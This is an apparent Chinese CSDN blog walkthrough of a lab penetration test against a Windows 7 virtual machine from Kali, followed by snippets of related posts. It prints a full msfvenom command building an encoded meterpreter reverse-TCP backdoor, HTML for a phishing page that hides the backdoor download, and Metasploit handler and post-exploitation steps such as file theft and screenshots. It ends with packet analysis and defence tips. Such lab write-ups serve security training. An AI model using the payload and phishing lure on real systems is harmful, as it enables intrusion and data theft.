安全渗透测试-win7

已于 2022-06-24 16:16:44 修改
阅读量2.5k 收藏 33
点赞数 5
文章标签: 安全 网络 运维
于 2022-06-24 16:15:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liuguangshibei/article/details/125439156
版权

安全渗透测试-win7-后门利用

环境说明:

攻击机:kali

靶机:windows7x64

靶机开放服务:Apache2.4.39、MySQL5.7.26

信息收集

采用工具:nmap、nessus

(1)执行ifconfig命令,查看本机IP地址为:192.168.2.65。采用nmap的ping扫描,扫描当前网络C段,查看存活的主机。
在这里插入图片描述
(2)使用nmap的SYN扫描,查询C段地址30-70的主机,找到开放80端口的windows主机,即为目标主机IP:192.168.2.60。
在这里插入图片描述
(3)查询目标主机的操作系统为Windows 7|2008|8.1
在这里插入图片描述
(4)用nessus查询目标主机的漏洞,如图所示:
在这里插入图片描述

渗透测试:

通过nessus找到目标系统的80端口开放并存在漏洞,准备利用该漏洞进行攻击。
(1)通过msfvenom生成后门木马并指定木马回弹的ip地址为kali攻击机,端口指定为4567端口:如图中shell.exe
终端输入:
: msfvenom -p windows/meterpreter_reverse_tcp LHOST={xxx.xxx.xxx.xxx} LPORT={xxxx} -e x86/shikata_ga_nai -f exe -o new.exe -i 5

在这里插入图片描述
(2)制作一个简单的静态钓鱼网站,并在网站中隐藏植入刚刚生成的shell文件。ps:不会写前端的宝贝也无所谓,网上随便找
一个html的静态页面代码就可以,然后在代码中插入:

    <li class="nav-item">
	<a class="nav-link" href="./shell.exe">标题任取</a>
	</li>

在这里插入图片描述
在kali中通过python开启简单web服务。PS:端口被占用开启失败的可以换一个端口
在这里插入图片描述
(3)在靶机中访问目标网站,并点击链接。
在这里插入图片描述
在靶机中下载shell文件:PS:靶机中防火墙等可能会自动清除,注意分辨
在这里插入图片描述
(4)在kali攻击机中开启msf,并使用handler监听模式:
在这里插入图片描述
设置lhost与lport与shell中设置的一样:
输入run命令,开始执行,并等待靶机上线:
在这里插入图片描述
(5) 在靶机中点击shell文件,回弹到kali,成功建立会话 ,在kali中使用dir、cat等命令成功获取指定文件:
在这里插入图片描述
在kali中截取靶机屏幕截图:
在这里插入图片描述

过程分析:

如图所示:在建立靶机执行shell文件时,建立TCP会话,回传ACK帧,通过三次握手,建立TCP链接:
在这里插入图片描述
在kali中输入dir命令,可以看到有TCP协议抓包,回传PSH帧,表明双方有数据传输:
在这里插入图片描述
在这里插入图片描述
在kali中执行quit命令,退出监听,可见回传FIN帧,表示链接关闭,回传RST帧,表示链接重置:
在这里插入图片描述

靶机防御:

(1)在靶机中找到后台运行的shell.exe结束进程,则攻击机中会话将被关闭:
在这里插入图片描述
在这里插入图片描述
(2)打开防火墙后,在点击钓下载链接时,防火墙会自动处理下载的后门病毒,则不会给攻击者可乘之机,所以作为靶机用户还是要提高警惕心理,不要随便点击下载链接,有可疑文件一定要合理辨别。

流光拾贝
关注
  • 5
    点赞
  • 33
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
中职网络安全技能大赛-Windows操作系统渗透测试
Jay
04-02 3184
Windows操作系统渗透测试 第一步,打开网络拓扑,点击启动选项,启动实验虚拟机 第二步,使用ifconfig或ipconfig命令获取地址 确认渗透机ip地址:172.16.1.100 确认靶机ip地址:172.16.1.200 1.通过本地PC中渗透测试平台Kali2.0对服务器场景p100_win03-22进行系统服务及版本扫描渗透测试,并将该操作显示结果中445端口对应的服务版本信息字符串作为Flag值提交; 进入kali命令控制台中使用nmap工具 Flag:Microso
渗透测试-[Meterpreter后渗透25招]
m0_43405474的博客
05-07 3283
渗透测试-[后渗透25招]0.实验环境1.MS08-067漏洞描述【RPC】2.主机发现3 利用MSF通过ms08-067漏洞渗透目标系统4.后渗透利用4.1.系统信息搜集(1)获取系统基本信息(2)判断目标系统是否为虚拟机(3)磁盘分区情况(4)目标软件安装情况(5)其他信息搜集4.2查看权限4.3 进入目标系统Shell4.4 添加账号4.5 将新账号添加到管理员组中4.6 截屏4.7 文件上传4.8 下载文件4.9 获取口令hash4.10 摄像头4.11 键盘监听(1) ps找到合适的进程进行迁移(
win7进行网络渗透
qq_57157540的博客
06-26 2335
1.ms原理:在已经安装的 Windows DNS 客户端处理链路本地多播名称解析查询方式中的一个缺陷可被利用来在 NetworkSer11-030 DNS 解析中的漏洞可能允许远程代码执行vice 帐户的上下文中执行任意代码。如果攻击者获得对网络的访问权限,然后创建自定义程序以向目标系统发送特制的 LLMNR 广播查询,则该漏洞可能允许远程执行代码。 2.渗透过程 设置参数 (payload,ip等) use exploit/windows/browser/ms11_003_ie_css_import
msf通过win7“ms17-010:永恒之蓝”进行渗透测试
weixin_41023533的博客
11-24 3327
msf通过win7“ms17-010:永恒之蓝”进行渗透测试 一.查找该漏洞 二.使用该漏洞的探测模块(auxiliary/scanner/smb/smb_ms17_010),对目标主机进行‘是否存在该漏洞’的检查 三.使用该漏洞的攻击模块进行攻击(use exploit/windows/smb/ms17_010_eternalblue) 四.创建新用户,并进行远程连接(方法一) 使用enable_rdp脚本开启远程桌面并创建用户 1.开启远程桌面:run post/windows/manage/en
Metasploit渗透测试之制作隐藏后门(一)——使用永恒之蓝漏洞win7进行渗透
最新发布
qq_63831588的博客
06-24 608
kali,永恒之蓝,漏洞利用,后门,远程连接,木马
渗透测试实验_安装Windows7旗舰版
weixin_47133613的博客
03-13 2276
文章目录安装Windows7旗舰版 安装Windows7旗舰版 第一步:新建虚拟机,导入镜像 输入密钥 选择安装的位置 固态类型选择BIOS 选择处理器数量 设定内存大小 分配磁盘,建议Windows7 64位选择60G 虚拟机创建成功 第二步:安装Windows7 安装成功 ...
内网win7渗透(初级)
weixin_51454892的博客
11-02 3523
攻击机kali2021 .查看一下IP地址 目标主机win7 ipconfig查看地址 :确保相互之前可以通讯 开始渗透; 开启kali命令行 使用工具nmap工具扫描一下目标开放端口 使用nmap扫描靶机查看可以利用模块(快) 显示可以利用模块ms17-010 打开渗透工具msfconsole 调用模块ms17-010 msf6>use ms17-010 (这是是新版kali调用命令,简便) 可以看到各种模块,这里我们只用...
利用MS17-010渗透win7(64位)
1stPeak's Blog
06-07 4629
这里是接着之前一篇"利用MS17-010渗透win7(32位)"的姊妹篇,想了解win7(32位)如何利用永恒之蓝渗透的请点击利用MS17-010渗透win7(32位) Win7x64的渗透,我们就可以不用下载利用模块了,kali里已经帮你集成好了 我这里的攻击机(192.168.1.222),靶机(192.168.1.111),记得靶机关闭防火墙 渗透流程 权限提升利用 渗透...
永恒之蓝windows7 下的渗透测试
舞动的獾
10-14 1360
漏洞介绍 永恒之蓝是影子经纪人黑客组织攻破美国NSA黑客组织后公布的漏洞工具之一。 2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大...
内网安全攻防-渗透测试指南 读书笔记.pdf
09-09
### 内网安全攻防-渗透测试指南 读书笔记 #### 一、内网渗透测试基础 在进行内网渗透测试之前,理解Powershell执行策略及其如何影响脚本运行至关重要。 - **Powershell执行策略**:Powershell的安全执行策略通过...
渗透系统虚拟机----win7
08-25
对于渗透测试,使用虚拟机是一个常见的做法,因为它提供了一个隔离的环境,可以安全地进行各种测试。如果你想在虚拟机中运行Windows 7,你可以按照以下步骤进行操作: 1. 虚拟化软件:首先,你需要选择一个虚拟化...
局域网渗透的一些小工具(支持win7
10-31
一些内网的,命令行格式的工具,可以来看看,很简单
Msf攻击Win7
07-09
Msf攻击Win7 metasploit
中国蚁剑,AntSword-Loader-v4.0.3-win32-x64和antSword-master
09-07
中国蚁剑,全称为AntSword,是一款开源的Web管理工具,主要用于网站的安全检测、渗透测试以及Webshell管理。这款工具因其高效、易用的特点,在网络安全领域内广受关注。本文将围绕AntSword-Loader-v4.0.3-win32-x64...
[网络安全 渗透实验 01]基于MSF框架渗透攻击Win7主机系统的设计与实现
m0_54524462的博客
02-01 1913
该文章仅供网络安全相关爱好者和学习者学习使用!
metasploit渗透测试入门
2301_77147676的博客
03-30 157
在中打开msfconsolemetasploit是一款kali自带的漏洞利用神器,在接下来的2个案例中,我们将利用的漏洞和的漏洞,进行渗透攻击演示,并获得目标主机的控制权,带你闯进渗透测试的神之领域。实验可以参考David Kennedy的《Metasploit:The Penetration Tester's Guide》,清华大学诸葛建伟老师翻译的《Metasploit渗透测试指南》​。
metasploit怎么渗透windows7
weixin_42576410的博客
02-14 232
Metasploit 是一款开源的渗透测试工具,可以用来检测和利用操作系统和应用程序的漏洞。如果您想渗透 Windows 7 系统,您可以按照以下步骤操作: 安装 Metasploit:您可以从 Metasploit 官方网站下载安装包进行安装。 启动 Metasploit:在 Windows 下您可以打开命令提示符,输入 msfconsole 启动 Metasploit。 选择目标:您需要...
kali木马入侵win7系统
皮卡乒的皮卡乓
06-19 2640
kali利用木马攻击win7
Win7下实现 lpk.dll劫持游戏注入
南的专栏
07-22 6760
由于输入表中只包含DLL名而没有它的路径名,因此加载程序必须在磁盘上搜索DLL文件。首先会尝试从当前程序所在的目录加载DLL,如果没找到,则在Windows系统目录中查找,最后是在环境变量中列出的各个目录下查找。利用这个特点,先伪造一个系统同名的DLL,提供同样的输出表,每个输出函数转向真正的系统DLL。程序调用系统DLL时会先调用当前目录下伪造的DLL,完成相关功能后,再跳到系统DLL同名函数里
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值